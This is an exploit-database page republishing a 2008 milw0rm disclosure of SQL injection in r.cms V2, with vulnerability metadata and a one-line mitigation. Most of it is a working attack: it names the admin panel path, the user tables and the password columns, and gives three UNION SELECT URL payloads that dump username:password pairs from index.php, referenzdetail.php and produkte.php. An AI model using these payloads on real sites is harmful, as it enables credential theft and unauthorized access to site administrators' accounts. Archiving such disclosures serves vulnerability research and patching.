r.cms V2 - Multiple SQL Injection Vulnerabilities

vendor:

r.cms

by:

Lidloses_Auge

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: r.cms

Affected Version From: r.cms V2

Affected Version To: r.cms V2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

r.cms V2 – Multiple SQL Injection Vulnerabilities

Almost every GET parameter is vulnerable to SQL Injection. There are two possible tables which contain user data, depending on the CMS version. The Columns for username and password are: username and userpassword. The exploit can be triggered by sending a malicious request to the target URL with the following payloads: http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*, http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*, http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
#
#           r.cms V2 - Multiple SQL Injection Vulnerabilities 
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, Free-Hack
#      Date:                        16.12.2008
#
###############################################################
#                                                             
#      Admin Panel: [Target]/rcms/
#      Description: Almost every GET parameter is vulnerable
#      				to SQL Injection, so i won't list 'em all.
#					There are two possible tables which contain
#					user data, depending on the CMS version.
#					Table:
#						rcmsv2
#					or:
#						rcms
#
#					The Columns for username and password are:
#						username
#						userpassword
#                                                             
###############################################################

http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*
http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

# milw0rm.com [2008-12-17]